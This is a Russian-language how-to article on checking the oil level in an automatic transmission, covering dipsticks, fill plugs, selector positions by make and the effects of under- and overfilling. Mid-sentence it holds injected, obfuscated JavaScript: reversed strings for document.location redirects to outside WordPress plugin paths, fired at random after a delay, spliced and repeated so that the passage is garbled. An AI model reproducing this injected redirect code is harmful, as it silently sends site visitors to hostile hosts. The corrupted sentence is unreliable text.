Рассмотрим тему Как проверить масло в АКПП и соответственно Как правильно проверить уровень масла АКПП.
Как правило, измеряют уровень, при работающем двигателе и на малых оборотах. Положение селектора, переключателя режимов, должно быть в «Р», а масло прогрето до 90 гр.С. Как узнать температуру? Просто проехать километров 15.
Как проверить масло в АКПП
Прогрели, нашли ровный участок дороги. Найдите где на автомобиле щуп, если он вообще предусмотрен в вашей модели, и вытащите его (есть коробки без щупа, но об этом ниже). Протрите чистой тряпочкой, сновапогрузите на место и снова вытащите для контроля уровня.
На щупе будет видно где уровень и в пределах ли метки с надписью «HOT». Бывают нижние метки, они показывают уровень, когда масло холодное. Но имейте в виду, это только для приблизительного залива при заменемасла. Точный замер всегда на прогретом масле.
На японских автомобилях Acura и Honda уровень проверяется при прогретом и заглушенном двигателе.
А на переднеприводных авто Hyundai, Mitsubishi, проверка уровня в положении селектора «N».
Обращаю ваше внимание, что АКПП от Mitsubishi может быть установлена на Chrysler и наоборот, где замеры в положении «Р».
Так что перед проверкой выясните какой у вас автомат и в каком положении вам нужно проверять уровень масла, в «N» или «P».
Главное не попутать. На АКПП той же фирмы Chrysler — Jeep Grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}antoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}and Cherokee и Jeep Cherokee, замеряется при «N».
На автомобилях Volkswagen и Audi с 3-х скоростными АКПП в «N».
Во многих коробках вообще нет щупа, их заменяет пробка. И как проверить уровень масла в акпп?
Масло наливается до уровня отверстия. Это отверстие, как вы догадались, используется для залива, которое и будет правильным уровнем.
Это конечно неудобно, придется автомобиль приподнимать или заезжать на яму. Но это сделано не спроста, а для того, чтобы не перелить, последствия перелива всегда плачевные.
Пробки делают в основном европейцы, американские автомобили все со щупами на АКПП, кроме одной коробки – 4Т40Е.
Но есть и вообще без щупа и отверстий для контроля уровня масла. Это популярная мерседесовская 5-ти ступенчатая автоматическая коробка, маркируется она — 722.6.
Как проверить масло в АКПП такого типа? А не надо проверять. Потому что немцы придумали отделить емкость с маслом и рабочим поддоном. Между ними установлен перепускной клапан, поддерживающий нужный уровень автоматически.
Как правильно проверить уровень масла в акпп и чем опасен перелив и недолив?
Низкий уровень, чем он опасен. Насос прихватывает воздух и начинает образовываться масло-воздушная эмульсия, вспененное масло.
Такая суспензия имеет свойство сжиматься, что приводит к снижению давления в системе управления передачами. Плюсом к тому, снижается отвод тепла, коробка начинает греться.
Ухудшается смазывающая роль такой смеси. Коробке приходит «кердык».
Засада в еще в том, что водитель, заметив неладное, сможет догадаться замерить уровень, а уровень не покажет недостаток, жидкость вспенена.
Как проверить уровень масла в акпп в таких условиях? Нужно заглушить мотор и дать время маслу успокоится и выпустить воздух, уровень наверняка станет ниже нормы. Долив обязателен, иначе АКПП прикажет долго жить и потребует раскошелиться.
Перелив масла в АКПП. Оно тоже вспенивается, но в отличие от недолива, не сразу после заводки двигателя, а в процессе работы, особенно на высоких оборотах.
Тоже увеличивается объем жидкости, которая ищет выхода из ограниченного пространства картера через сапуны.
Под машину будет страшно заглянуть. Всё будет в масле.
Следите за уровнем масла в АКПП и будет вам счастье!
И прочитайте про типтроник в АКПП — «to-ru.ru/tiptronic-chto-eto.html» target=»_blank» rel=»noopener»>Tiptronic что это благо или пустая трата денег?«. Да не забудьте про старую добрую механику «to-ru.ru/chto-takoe-mehanicheskaya-korobka-peredach.html» target=»_blank» rel=»noopener»>Что такое механическая КПП и какие у нее есть преимущества?«